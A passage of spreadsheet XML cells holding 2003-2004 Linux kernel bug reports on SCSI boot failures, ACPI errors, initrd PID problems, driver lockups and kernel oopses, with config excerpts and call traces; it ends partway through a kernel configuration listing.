    <t>Distribution: Slackware 9.1 (all current updates) Hardware Environment: Abit KD7 AMD 2600+ (333mhz FSB) 1gb DDR 333mhz Corsair LSI 53C1010-33 SCSI Controller IBM 1C35L036UCPR15-0 80p Ultra3 SCSI Drive (connected via plug adapter) (Linux) IBM Deskstar IDE Drive (windows) LG DVD-Rom Lite-On 40x12x48 CD-RW Soundblaster Live GeForce4 440 MX Software Environment: gcc 3.3.2 Problem Description: SCSI_SYM53C8XX_2 &amp; Fusion MPT drivers cannot boot. SCSI_SYM53C8XX_2 driver boots just fine with identical settings on 2.4.23 on same machine. I turned on verbose scsi error reporting and saw that the driver was there, it appeared to detect the scsi card, but I still get: VFS: Cannot open root device "801" or sda1 It scrolls by pretty fast so I can't get much more then that, I might be able to find out some other things if someone asks for something specific. Relavent .config from 2.6 ------------------------- # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set CONFIG_SCSI_PPA=m CONFIG_SCSI_IMM=m # CONFIG_SCSI_IZIP_EPP16 is not set # CONFIG_SCSI_IZIP_SLOW_CTR is not set CONFIG_SCSI_SYM53C8XX_2=y CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=1 CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16 CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64 # CONFIG_SCSI_SYM53C8XX_IOMAPPED is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set --------------------------------------- Relavent .config from 2.4.23 --------------------------- # SCSI support # CONFIG_SCSI=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y CONFIG_SD_EXTRA_DEVS=40 # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_SR_EXTRA_DEVS=2 CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_DEBUG_QUEUES=y CONFIG_SCSI_MULTI_LUN=y # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is not set # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AHA1740 is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_MEGARAID2 is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_DMA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set CONFIG_SCSI_PPA=m CONFIG_SCSI_IMM=m CONFIG_SCSI_IZIP_EPP16=y # CONFIG_SCSI_IZIP_SLOW_CTR is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_NCR53C7xx is not set CONFIG_SCSI_SYM53C8XX_2=y CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=1 CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16 CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64 # CONFIG_SCSI_SYM53C8XX_IOMAPPED is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_SEAGATE is not set # CONFIG_SCSI_SIM710 is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set Lilo.conf ------------------------ # LILO configuration file # generated by 'liloconfig' # # Start LILO global section lba32 # Allow booting past 1024th cylinder with a recent BIOS #append="hdd=ide-scsi" default=Linux boot=/dev/sda message = /boot/boot_message.txt prompt timeout = 30 # Override dangerous defaults that rewrite the partition table: change-rules reset # Normal VGA console vga = normal image = /boot/conf260 root = /dev/sda1 label = Linux read-only image = /boot/conf2.4.23rc5 root = /dev/sda1 label = Linux-2.4 read-only Steps to reproduce: compile, copy arch/i386/boot/bzImage &amp; System.map to /boot, update lilo, reboot.</t>
  </si>
  <si>
    <t>AE_BAD_PARAMETER returned from ec address space handler.</t>
  </si>
  <si>
    <t>2.4 , 2.6</t>
  </si>
  <si>
    <t>2003-12-24 19:55 UTC</t>
  </si>
  <si>
    <t>2005-01-26 21:53 UTC</t>
  </si>
  <si>
    <t>Greg Sarjeant [greg@morningdave.org] said: Hello, I know that this has been covered here before, but I have gotten stuck, so I was wondering if someone could give me a nudge in the right direction. I have a Gateway 200x. Apparently, as discussed here previously (http://sourceforge.net/mailarchive/message.php?msg_id=6514510), these machines do not provide an ECDT. I am getting some EmbeddedController errors in dmesg, and do not have battery, button, thermal or ac adapter support. Obviously, it would be nice to resolve this :) I followed the thread above, and noticed that there is a patch for the 2.4.23 kernel that allows you to supply an ECDT as a boot parameter. Sounds like just the thing. I have applied the patch and am sending what I believe to be the correct parameters to the kernel in my grub.conf, but it will not use the faked ECDT. I imagine that I am just doing something stupid, but I can't figure out what it is right now. I have tried a number of different ways of specifying these parameters, but none has worked so far. I've posted some files (DSDT, dmesg, grub.conf and the version of the patch that I applied) at http://www.morningdave.org/acpi/. If someone could look them over and let me know if anything jumps out as obviously wrong, I would really appreciate it. Right now, I'm hopeful that it is just a subtle difference in the syntax for lilo.conf and grub.conf that I am not catching. If you need any other information, please let me know. Also, if it wouldn't be too much trouble, could someone let me know how one determines the command and data ports that are used by the EmbeddedController? I am using the values that folks seemed to agree on in the previous thread for this machine (0x66 and 0x62, respectively). But my only real justification is that they were mentioned in that thread, and I see those values in the DSDT. I don't really understand how I could have identified them without someone who knows what he is doing providing them first. Thanks, Greg ~</t>
  </si>
  <si>
    <t>atkbd.c : Unknown key pressed (raw set0, code 0x17e on isa0060/serio2)</t>
  </si>
  <si>
    <t>2.6.0-mm1</t>
  </si>
  <si>
    <t>2003-12-25 01:21 UTC</t>
  </si>
  <si>
    <t>2004-02-01 02:07 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo Linux 1.4 Hardware Environment:Compaq Presario X1005EA Software Environment:at Linux startup Problem Description:The eject button of my CD Drive doesn't function after entering a CD , mounting, using this CD and finally umounting. At startup, my dmesg show error messages like the following : atkbd.c : Unknown key pressed (raw set0, code 0x17e on isa0060/serio2) atkbd.c : Unknown key pressed (raw set0, code 0x17e on isa0060/serio3) synaptics reset failed Steps to reproduce: compile th 2.6.0 kernel with the 2.6.0-mm1 patch with the following compilation options : in acpi (pm_timer to avoid loose ticks messages).</t>
  </si>
  <si>
    <t>When booting through INITRD startup script '/linuxrc' doesn't have PID 1.</t>
  </si>
  <si>
    <t>2003-12-25 11:11 UTC</t>
  </si>
  <si>
    <t>Vincent MEYER</t>
  </si>
  <si>
    <t>2004-04-11 08:54 UTC</t>
  </si>
  <si>
    <t>other_other</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Standard PC/athlon Software Environment: linux 2.6.0 downloaded from kernel.org, no additional patch. Problem Description: I'm using diskless stations. They get kernel and inird (mkelf-linux) through etherboot. kernel booting goes well, it launches /linuxrc. I then do some stuff and switches roots. Everything is then done as explained in Documentation/initrd.txt. Everything works perfectly under 2.4 kernels. Just switching to a 2.6 kernel makes init (exec chroot . /sbin/init &lt;dev/console &gt;dev/console 2&gt;&amp;1) failing after writing usage. That's typical of not having PID 1. I then introduced a 'ps' command in /linuxrc that confirmed to me it didn't have PID 1. End of /linuxrc (commands and screen output (manually copied)) : ps -e aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND #0 1 46.0 0.0 0 0 ? RW 19:41 0:02 [swapper] #0 2 0.0 0.0 0 0 ? SWN 19:41 0:00 [ksoftirqd/0] #0 3 0.0 0.0 0 0 ? SW&lt; 19:41 0:00 [events/0] #0 4 0.0 0.0 0 0 ? SW&lt; 19:41 0:00 [kblockd/0] #0 5 0.0 0.0 0 0 ? SW 19:41 0:00 [khubd] #0 6 0.0 0.0 0 0 ? SW 19:41 0:00 [pdflush] #0 7 0.0 0.0 0 0 ? SW 19:41 0:00 [pdflush] #0 8 0.0 0.0 0 0 ? SW 19:41 0:00 [kswapd0] #0 9 0.0 0.0 0 0 ? SW&lt; 19:41 0:00 [aio/0] #0 11 0.0 0.0 0 0 ? SW 19:41 0:00 [kseriod] #0 12 0.0 0.2 2344 1112 ? R 19:41 0:00 /bin/sh /linuxrc #0 29 0.0 0.0 0 0 ? SW 19:41 0:00 [rpciod] #0 30 0.0 0.0 0 0 ? SW 19:41 0:00 [lockd] #0 42 0.0 0.1 2320 756 ? R 19:41 0:00 ps -e aux read -t 15 umount /proc cd station [ ! -d initrd ] &amp;&amp; mkdir initrd pivot_root . initrd exec chroot . /sbin/init &lt;dev/console &gt;dev/console 2&gt;&amp;1 Usage: init 0123456SsQqAaBbCcUu then kernel try to get another root filesystem. Steps to reproduce: see just above.</t>
  </si>
  <si>
    <t>b44 driver dead-locks system with 2.6.0 kernel upon activation</t>
  </si>
  <si>
    <t>2003-12-26 13:48 UTC</t>
  </si>
  <si>
    <t>Ronny Bremer</t>
  </si>
  <si>
    <t>2005-06-04 11:01 UTC</t>
  </si>
  <si>
    <t>Distribution: fedora core 1 Hardware Environment: dell inspiron 8500 notebook Software Environment: 2.6.0-104 kernel Problem Description: insmod b44 works fine, but when using the ethernet card (ifup eth0) it freezes the system. I need to power off the computer to resume my work. Steps to reproduce: ifup eth0</t>
  </si>
  <si>
    <t>ohci1394_init debug trace at mm/slab.c:1856</t>
  </si>
  <si>
    <t>2003-12-27 11:59 UTC</t>
  </si>
  <si>
    <t>2004-06-21 13:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux (Kernel 2.6.0 stable from kernel.org) Hardware Environment: i686 AMD Athlon(tm) XP 1500+ AuthenticAMD GNU/Linux Software Environment: gcc (GCC) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) Problem Description: Debug trace show up in dmesg (i first put the description in a wrong place bug #1475). Steps to reproduce: modprobe ohci1394 (first trace) startx (2nd trace) I've just bought a FireWire card (Adaptec AUA-3121/EFIGS) with USB 2.0 and FireWire outputs. In the same time i've built the 2.6.0 stable kernel that have been released last week. I've turn on the computer with this new kernel and the new card in it and is wasn't recognized (i forgot to load the module) so i made a modprobe ohci1394 and this put a trace im my dmeg :-( Here is my lspci and part of the dmesg. I will also put an attachement for the full dmesg. * lspci, new card is (at least) Hint, USB 2.0 and IEEE1394 : 00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 03) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] 00:07.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) 00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE (rev 06) 00:07.2 USB Controller: VIA Technologies, Inc. USB (rev 1a) 00:07.3 USB Controller: VIA Technologies, Inc. USB (rev 1a) 00:07.4 SMBus: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) 00:07.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 50) 00:0a.0 PCI bridge: Hint Corp HB6 Universal PCI-PCI bridge (non-transparent mode) (rev 13) 00:0c.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev b2) 02:08.0 USB Controller: NEC Corporation USB (rev 41) 02:08.1 USB Controller: NEC Corporation USB (rev 41) 02:08.2 USB Controller: NEC Corporation USB 2.0 (rev 02) 02:0b.0 FireWire (IEEE 1394): Texas Instruments TSB12LV26 IEEE-1394 Controller (Link) * Trace in dmesg when modprobe ohci1394 : ohci1394: $Rev: 1045 $ Ben Collins &lt;bcollins@debian.org&gt; ohci1394_0: OHCI-1394 1.0 (PCI): IRQ=[17] MMIO=[dfeff000-dfeff7ff] Max Packet=[2048] Debug: sleeping function called from invalid context at mm/slab.c:1856 in_atomic():1, irqs_disabled():0 Call Trace: [&lt;c011c18b&gt;] __might_sleep+0xab/0xd0 [&lt;c013f5f5&gt;] kmem_cache_alloc+0x65/0x70 [&lt;c011c5d9&gt;] dup_task_struct+0x29/0xe0 [&lt;c011d328&gt;] copy_process+0xc8/0xb60 [&lt;c0126856&gt;] update_process_times+0x46/0x50 [&lt;c01266cd&gt;] update_wall_time+0xd/0x40 [&lt;c011de0d&gt;] do_fork+0x4d/0x180 [&lt;c0119ce0&gt;] recalc_task_prio+0x90/0x1a0 [&lt;c01073c5&gt;] kernel_thread+0x85/0x90 [&lt;f8abeff0&gt;] nodemgr_host_thread+0x0/0x1b0 [ieee1394] [&lt;c0107334&gt;] kernel_thread_helper+0x0/0xc [&lt;f8abf46e&gt;] nodemgr_add_host+0xde/0x130 [ieee1394] [&lt;f8abeff0&gt;] nodemgr_host_thread+0x0/0x1b0 [ieee1394] [&lt;f8a48810&gt;] ohci_initialize+0x210/0x220 [ohci1394] [&lt;f8abad96&gt;] highlevel_add_host+0x76/0x80 [ieee1394] [&lt;f8aba34d&gt;] hpsb_add_host+0x6d/0xa0 [ieee1394] [&lt;f8a4cbb2&gt;] ohci1394_pci_probe+0x482/0x590 [ohci1394] [&lt;f8a4a8e0&gt;] ohci_irq_handler+0x0/0x7d0 [ohci1394] [&lt;c01ea56b&gt;] pci_device_probe_static+0x4b/0x60 [&lt;c01ea5bc&gt;] __pci_device_probe+0x3c/0x50 [&lt;c01ea5fc&gt;] pci_device_probe+0x2c/0x50 [&lt;c0252fed&gt;] bus_match+0x3d/0x70 [&lt;c025311c&gt;] driver_attach+0x5c/0x90 [&lt;c025340b&gt;] bus_add_driver+0x9b/0xb0 [&lt;c0253851&gt;] driver_register+0x31/0x40 [&lt;c01ea7db&gt;] pci_register_driver+0x5b/0x80 [&lt;f89ae015&gt;] ohci1394_init+0x15/0x3c [ohci1394] [&lt;c013553a&gt;] sys_init_module+0x14a/0x2a0 [&lt;c01094cb&gt;] syscall_call+0x7/0xb ieee1394: Host added: ID:BUS[0-00:1023] GUID[005042b50000f77a] * Trace in dmesg when starting x (nvidia kernel) : nvidia: no version for "struct_module" found: kernel tainted. nvidia: no version magic, tainting kernel. nvidia: module license 'NVIDIA' taints kernel. 0: nvidia: loading NVIDIA Linux x86 nvidia.o Kernel Module 1.0-4496 Wed Jul 16 19:03:09 PDT 2003 Debug: sleeping function called from invalid context at mm/slab.c:1856 in_atomic():1, irqs_disabled():0 Call Trace: [&lt;c011c18b&gt;] __might_sleep+0xab/0xd0 [&lt;c013f5f5&gt;] kmem_cache_alloc+0x65/0x70 [&lt;c014e981&gt;] __get_vm_area+0x21/0x100 [&lt;c014ea93&gt;] get_vm_area+0x33/0x40 [&lt;c01193f3&gt;] __ioremap+0xb3/0x100 [&lt;c0119469&gt;] ioremap_nocache+0x29/0xb0 [&lt;f8cc5492&gt;] os_map_kernel_space+0x68/0x6c [nvidia] [&lt;f8cd7a87&gt;] __nvsym00568+0x1f/0x2c [nvidia] [&lt;f8cd9ba6&gt;] __nvsym00775+0x6e/0xe0 [nvidia] [&lt;f8cd9c36&gt;] __nvsym00781+0x1e/0x190 [nvidia] [&lt;f8cdb6bc&gt;] rm_init_adapter+0xc/0x10 [nvidia] [&lt;f8cc1ee0&gt;] nv_kern_open+0xf5/0x232 [nvidia] [&lt;c015d9b4&gt;] chrdev_open+0xf4/0x220 [&lt;c01afadb&gt;] devfs_open+0xeb/0x110 [&lt;c015359b&gt;] dentry_open+0x14b/0x220 [&lt;c0153446&gt;] filp_open+0x66/0x70 [&lt;c01538e3&gt;] sys_open+0x53/0x90 [&lt;c01094cb&gt;] syscall_call+0x7/0xb Debug: sleeping function called from invalid context at mm/slab.c:1856 in_atomic():1, irqs_disabled():0 Call Trace: [&lt;c011c18b&gt;] __might_sleep+0xab/0xd0 [&lt;c013801b&gt;] __lock_page+0xbb/0xd0 [&lt;c013f5f5&gt;] kmem_cache_alloc+0x65/0x70 [&lt;c014e981&gt;] __get_vm_area+0x21/0x100 [&lt;c014ea93&gt;] get_vm_area+0x33/0x40 [&lt;c01193f3&gt;] __ioremap+0xb3/0x100 [&lt;c0119469&gt;] ioremap_nocache+0x29/0xb0 [&lt;f8cc5492&gt;] os_map_kernel_space+0x68/0x6c [nvidia] [&lt;f8cd7a87&gt;] __nvsym00568+0x1f/0x2c [nvidia] [&lt;f8cd9ba6&gt;] __nvsym00775+0x6e/0xe0 [nvidia] [&lt;f8cd9c36&gt;] __nvsym00781+0x1e/0x190 [nvidia] [&lt;f8cdb6bc&gt;] rm_init_adapter+0xc/0x10 [nvidia] [&lt;f8cc1ee0&gt;] nv_kern_open+0xf5/0x232 [nvidia] [&lt;c015d9b4&gt;] chrdev_open+0xf4/0x220 [&lt;c01afadb&gt;] devfs_open+0xeb/0x110 [&lt;c015359b&gt;] dentry_open+0x14b/0x220 [&lt;c0153446&gt;] filp_open+0x66/0x70 [&lt;c01538e3&gt;] sys_open+0x53/0x90 [&lt;c01094cb&gt;] syscall_call+0x7/0xb agpgart: Found an AGP 2.0 compliant device at 0000:00:00.0. agpgart: Putting AGP V2 device at 0000:00:00.0 into 4x mode agpgart: Putting AGP V2 device at 0000:01:00.0 into 4x mode APIC error on CPU0: 00(02)</t>
  </si>
  <si>
    <t>Peter Teichmann</t>
  </si>
  <si>
    <t>Null pointer in acpi_ex_resolve_multiple</t>
  </si>
  <si>
    <t>2003-12-30 00:12 UTC</t>
  </si>
  <si>
    <t>ACPI: Subsystem revision 20031205 tbget-0291: *** Info: Table [DSDT] replaced by host OS tbxface-0117 [03] acpi_load_tables : ACPI Tables successfully acquired Parsing all Control Methods:.................................................... Table [DSDT](id F004) - 1098 Objects with 52 Devices 332 Methods 18 Regions ACPI Namespace successfully loaded at root c04c839c ACPI: IRQ9 SCI: Edge set to Level Trigger. evxfevnt-0093 [04] acpi_enable : Transition to ACPI mode successful evgpeblk-0747 [06] ev_create_gpe_block : GPE 00 to 15 [_GPE] 2 regs at 0000009 Completing Region/Field/Buffer/Package initialization:.......................... Initialized 14/18 Regions 81/81 Fields 46/46 Buffers 27/27 Packages (1106 nodes) Executing all Device _STA and_INI methods:.....................................1 [ACPI Debug] String: 2222222 [ACPI Debug] String: sizeof refof SXX0 [ACPI Debug] Integer: 0000000000000006 [ACPI Debug] String: SXX5 [ACPI Debug] String: sizeof arg0 [ACPI Debug] Integer: 0000000000000006 [ACPI Debug] String: sizeof refof arg0 Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c01f6833 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c01f6833&gt;] Not tainted EFLAGS: 00010246 EIP is at acpi_ex_resolve_multiple+0x1e7/0x258 eax: 00000071 ebx: 00000000 ecx: c12bbb70 edx: c12bbb84 esi: cfe1c628 edi: cfe1c628 ebp: c12bbbb8 esp: c12bbb84 ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=c12ba000 task=c12b98c0) Stack: 00000080 c0341556 c03414f1 00200000 00000000 cfe22028 cfe221e0 00000000 c01f8f25 cfe22028 cfe1c628 c12bbbbc c12bbbb8 c12bbbcc c0351740 00000000 00000080 c0341751 c034170f c0341e59 00000000 cfe22028 c12e35e8 c12e5348 Call Trace: [&lt;c01f8f25&gt;] acpi_ex_opcode_1A_0T_1R+0x3a7/0x4be [&lt;c01eda82&gt;] acpi_ds_exec_end_op+0x424/0x452 [&lt;c020564a&gt;] acpi_ps_parse_loop+0x41e/0xa9a [&lt;c020e1df&gt;] acpi_ut_status_exit+0x33/0x56 [&lt;c01ee264&gt;] acpi_ds_call_control_method+0x1e6/0x26c [&lt;c01f07f3&gt;] acpi_ds_get_current_walk_state+0x3f/0x4a [&lt;c0205f18&gt;] acpi_ps_parse_aml+0x252/0x276 [&lt;c0206b07&gt;] acpi_psx_execute+0x23b/0x290 [&lt;c0201d53&gt;] acpi_ns_execute_control_method+0xbb/0x106 [&lt;c0201c3c&gt;] acpi_ns_evaluate_by_handle+0xd4/0x130 [&lt;c02019d4&gt;] acpi_ns_evaluate_relative+0x154/0x1a0 [&lt;c01deac2&gt;] __delay+0x12/0x20 [&lt;c0241562&gt;] serial8250_console_write+0x162/0x270 [&lt;c020e442&gt;] acpi_ut_evaluate_object+0x42/0x1a6 [&lt;c020e997&gt;] acpi_ut_execute_STA+0x49/0xc2 [&lt;c0203bdd&gt;] acpi_ns_init_one_device+0x9f/0x1ce</t>
  </si>
  <si>
    <t>conntrack oops while reading /proc/net/ip_conntrack</t>
  </si>
  <si>
    <t>2003-12-30 10:31 UTC</t>
  </si>
  <si>
    <t>Christophe Saout</t>
  </si>
  <si>
    <t>2004-07-03 02:23 UTC</t>
  </si>
  <si>
    <t>Distribution: Should be independentent from the distro (vanilla kernels), but happened with a SuSE linux 8.2. Hardware Environment: Intel pentium III UP 512 MB RAM (actually, the whole computer was changed once, so it's not a hardware problem) Software Environment: gcc 2.95, linux 2.6.0 (vanilla), iptables 1.2.8, oidentd 2.0.7somethingsomethingsomethingsomethingsomethingsomething (but the same kind of problem occured with 2.4.18, 2.4.22 and different compilers, also gcc 3.2) Problem Description: Kernel oops: Machine used as a firewall/NAT router. oidentd likes to oops when reading /proc/net/ip_conntrack, but only/mostly when trying to open FTP connections, but also seen using the POP3 protocol on an older 2.4 kernel. c03b2cb1 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 060:[&lt;c03b2cb1&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010286 eax: 00000000 ebx: dfcec638 ecx: dd02a276 edx: 00007ff0 esi: dfcec638 edi: dd02a277 ebp: dcff5f08 esp: dcff5efc ds: 007b es: 007b ss: 0068 Stack: dfcec638 00000277 dcff5f34 dcff5f38 c03b2fee dd02a277 dfcec638 00000000 dd12ca9c 00000400 00007ff0 00000000 00000fff 00000277 0000001b dcff5f74 c01a3dc7 dd02a000 dcff5f70 00000016 00000400 00000000 dd12ca9c dd12cabc Call Trace: [&lt;c03b2fee&gt;] list_conntracks+0x19e/0x224 [&lt;c01a3dc7&gt;] proc_file_read+0xbb/0x238 [&lt;c016838e&gt;] vfs_read+0xa2/0xd4 [&lt;c0168570&gt;] sys_read+&lt;0x30/0x50 [&lt;c010bbbf&gt;] syscall_call+0x7/0xb Code: 83 78 18 00 74 39 83 7e 5c 00 74 18 a1 00 76 4b c0 8b 56 34 &gt;&gt;EIP; c03b2cb1 &lt;print_expect+15/b8&gt; &lt;===== &gt;&gt;ebx; dfcec638 &lt;_end+1f715f28/3fa278f0&gt; &gt;&gt;ecx; dd02a276 &lt;_end+1ca53b66/3fa278f0&gt; &gt;&gt;esi; dfcec638 &lt;_end+1f715f28/3fa278f0&gt; &gt;&gt;edi; dd02a277 &lt;_end+1ca53b67/3fa278f0&gt; &gt;&gt;ebp; dcff5f08 &lt;_end+1ca1f7f8/3fa278f0&gt; &gt;&gt;esp; dcff5efc &lt;_end+1ca1f7ec/3fa278f0&gt; Trace; c03b2fee &lt;list_conntracks+19e/224&gt; Trace; c01a3dc7 &lt;proc_file_read+bb/238&gt; Trace; c016838e &lt;vfs_read+a2/d4&gt; Trace; c0168570 &lt;sys_read+30/50&gt; Trace; c010bbbf &lt;syscall_call+7/b&gt; Code; c03b2cb1 &lt;print_expect+15/b8&gt; 00000000 &lt;_EIP&gt;: Code; c03b2cb1 &lt;print_expect+15/b8&gt; &lt;===== 0: 83 78 18 00 cmpl $0x0,0x18(%eax) &lt;===== Code; c03b2cb5 &lt;print_expect+19/b8&gt; 4: 74 39 je 3f &lt;_EIP+0x3f&gt; Code; c03b2cb7 &lt;print_expect+1b/b8&gt; 6: 83 7e 5c 00 cmpl $0x0,0x5c(%esi) Code; c03b2cbb &lt;print_expect+1f/b8&gt; a: 74 18 je 24 &lt;_EIP+0x24&gt; Code; c03b2cbd &lt;print_expect+21/b8&gt; c: a1 00 76 4b c0 mov 0xc04b7600,%eax Code; c03b2cc2 &lt;print_expect+26/b8&gt; 11: 8b 56 34 mov 0x34(%esi),%edx Apparently expect-&gt;expectant-&gt;helper is NULL in print_expect (net/ipv4/netfilter/ip_conntrack_standalone.c). Steps to reproduce: Seems to be the difficult thing here. It always happens when you don't need it. ;) An FTP client in the private network tries to open an FTP connection on an external server. The router masquerades (-j MASQUERADE) the packet. The FTP server tries to send an ident request back, oidentd answers and tries to look into /proc/net/ip_conntrack and sometimes... boom (especially after rebooting the machine, if it ran for some time you can do thounsands of FTP connections and nothing happens). The machine has actually three NICs: the private net, the internet (listens on 6 IP addresses) and the DMZ. Since this is a productive system I can't do too much testing unfortunately. If you need more, please ask me. .config: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_IKCONFIG is not set # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # # Loadable module support # # CONFIG_MODULES is not set # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y # CONFIG_SMP is not set CONFIG_PREEMPT=y 